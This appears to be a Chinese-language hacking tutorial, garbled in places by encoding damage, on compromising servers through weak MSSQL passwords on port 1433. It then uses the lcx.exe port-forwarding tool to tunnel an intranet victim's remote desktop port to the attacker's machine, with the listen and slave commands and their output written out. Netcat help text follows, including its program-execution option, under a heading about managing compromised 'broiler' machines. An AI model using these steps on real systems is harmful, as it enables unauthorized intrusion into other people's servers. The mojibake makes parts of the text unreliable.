以前抓肉雞都是通過(guò)1433弱口令,然后..
但是發(fā)現(xiàn)很多服務(wù)器開(kāi)了1433,3389,但是終端是連不上的,因?yàn)榉?wù)器本身是在內(nèi)網(wǎng),只對(duì)外開(kāi)放了1433端口,幸好有l(wèi)cx.exe這個(gè)東西,用sqltools.exe傳倒服務(wù)器上...
lcx.exe是個(gè)端口轉(zhuǎn)發(fā)工具,相當(dāng)于把肉雞A上的3389端口轉(zhuǎn)發(fā)到B機(jī)上,當(dāng)然這個(gè)B機(jī)必須有外網(wǎng)IP.這樣鏈接B機(jī)的3389度端口就相當(dāng)于鏈接A機(jī)的3389.
用法:如在本機(jī)B上監(jiān)聽(tīng) -listen 51 3389�����,在肉雞A上運(yùn)行-slave 本機(jī)ip 51 肉雞ip 3389??? 那么在本地連127.0.0.1就可以連肉雞的3389.第二條是本機(jī)轉(zhuǎn)向�����。
例:現(xiàn)在有一個(gè)ip為 201.1.1.1的1433弱.用端口掃描只發(fā)現(xiàn)開(kāi)放了1433端口.用sqltools鏈接,dir 看一下 C:\>DIR C:\
? autoAK 2005/02/21??? 17:08????? 12,541 avgun.log�����。。����。。����。。�����。����。。����。。�����。。�����。����。����。。�����。����。。�����。�����。。����。。�����。�����。����。。�����。����。����。�����。�����。����。����。。����。。�����。。�����。
日語(yǔ),顯示不正常.呵呵.
netstat -an 查看開(kāi)放端口??? TCP??? 0.0.0.0:3376??? 0.0.0.0:0????? LISTENING
TCP??? 0.0.0.0:3389??? 0.0.0.0:0????? LISTENING
TCP??? 0.0.0.0:3791??? 0.0.0.0:0????? LISTENING
TCP??? 0.0.0.0:3877??? 0.0.0.0:0????? LISTENING
終端已開(kāi).看下IP
ipconfig
C:\>ipconfig
Windows 2000 IP Configuration??? Ethernet adapter
Connection-specific DNS Suffix??? . :
IP Address. . . . . . . . . . . . : 192.168.1.24
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1192這樣的是內(nèi)網(wǎng)了...
現(xiàn)在可以用lcx.exe搞定了...
上傳lcx.exe到肉雞...C:\>dir lcx.exeC:\WINNT\system32
2006/04/02??? 13:40????? 32,768 lcx.exe首先在自己機(jī)子的cmd下運(yùn)行
lcx.exe -listen 51 3389
意思是監(jiān)聽(tīng)51端口并轉(zhuǎn)發(fā)到3389端口
顯示如下[+] Listening port 51 ......
[+] Listen OK!
[+] Listening port 3389 ......
[+] Listen OK!
[+] Waiting for Client on port:51 ......然后在肉雞上運(yùn)行 lcx.exe -slave 你的IP 51 201.1.1.1 3389
201.1.1.1是我舉例用的肉雞IP.換成你的..運(yùn)行以后本機(jī)監(jiān)聽(tīng)端口就會(huì)收到信息.[+] Listening port 51 ......
[+] Listen OK!
[+] Listening port 3389 ......
[+] Listen OK!
[+] Waiting for Client on port:51 ......
[+] Accept a Client on port 55 from 201.1.1.1 ......
[+] Waiting another Client on port:3389....好了.現(xiàn)在在自己機(jī)子上鏈接 127.0.0.1 或者輸你自己IP.
發(fā)現(xiàn)進(jìn)去的不是自己機(jī)子,(或者自己機(jī)子根本連不上),而是肉雞A了!優(yōu)點(diǎn),搞定內(nèi)網(wǎng)肉雞.
缺點(diǎn),有點(diǎn)麻煩,而且每次都要通過(guò)sqltools先進(jìn)行端口轉(zhuǎn)發(fā).當(dāng)然也可以用反彈木馬控制肉雞了...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
nc.exe的使用方法
1. Netcat 1.10 for NT - nc11nt.zip,原始英文信息
2. Netcat 1.10 for NT 幫助信息
3. Netcat 1.10 常用的命令格式
4. 管理肉雞,更改肉雞設(shè)置
#p#副標(biāo)題#e#
5. 下載連接
######################################################################
1. Netcat 1.10 for NT - nc11nt.zip
######################################################################
Basic Features
* Outbound or inbound connections, TCP or UDP, to or from any ports
* Full DNS forward/reverse checking, with appropriate warnings
* Ability to use any local source port
* Ability to use any locally-configured network source address
* Built-in port-scanning capabilities, with randomizer
* Can read command line arguments from standard inputb
* Slow-send mode, one line every N seconds
* Hex dump of transmitted and received data
* Ability to let another program service established
connections
* Telnet-options responder
New for NT
* Ability to run in the background without a console window
* Ability to restart as a single-threaded server to handle a new
connection
________________________________________________________________________
Some of the features of netcat are:
Outbound or inbound connections, TCP or UDP, to or from any ports
Full DNS forward/reverse checking, with appropriate warnings
Ability to use any local source port
Ability to use any locally-configured network source address
Built-in port-scanning capabilities, with randomizer
Built-in loose source-routing capability
Can read command line arguments from standard input
Slow-send mode, one line every N seconds
Optional ability to let another program service inbound connections
Some of the potential uses of netcat:
Script backends
Scanning ports and inventorying services
Backup handlers
File transfers
Server testing and simulation
Firewall testing
Proxy gatewaying
Network performance testing
Address spoofing tests
Protecting X servers
1001 other uses you`ll likely come up with
Netcat + Encryption = Cryptcat
對(duì)比win2000微軟的telnet.exe和微軟的tlntsvr.exe服務(wù),連接的時(shí)候就可以看出來(lái)了.
1.1 NC.EXE是一個(gè)非標(biāo)準(zhǔn)的telnet客戶端程序,
1.2 還有一個(gè)putty.exe客戶端程序,提供四種連接模式
-raw -telnet -rlogin -ssh.
######################################################################
2. Netcat 1.10 for NT 幫助信息
######################################################################
C:\WINDOWS\Desktop>nc -h
[v1.10 NT]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, background mode (后臺(tái)模式)
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft (本幫助信息)
-i secs delay interval for lines sent, ports scanned (延遲時(shí)間)
-l listen mode, for inbound connects (監(jiān)聽(tīng)模式,等待連接)
-L listen harder, re-listen on socket close (連接關(guān)閉后,仍然繼續(xù)監(jiān)聽(tīng))
-n numeric-only IP addresses, no DNS (ip數(shù)字模式,非dns解析)
-o file hex dump of traffic (十六進(jìn)制模式輸出文件,三段)
-p port local port number (本地端口)
-r randomize local and remote ports (隨機(jī)本地遠(yuǎn)程端口)
-s addr local source address (本地源地址)
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose] (-vv 更多信息)
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning] (掃描模式,-vv)
port numbers can be individual or ranges: m-n [inclusive]
#p#副標(biāo)題#e#
##########
關(guān)鍵詞標(biāo)簽:lcx.exe,nc.exe,sc.ex
安裝紅帽子RedHat Linux9.0操作系統(tǒng)教程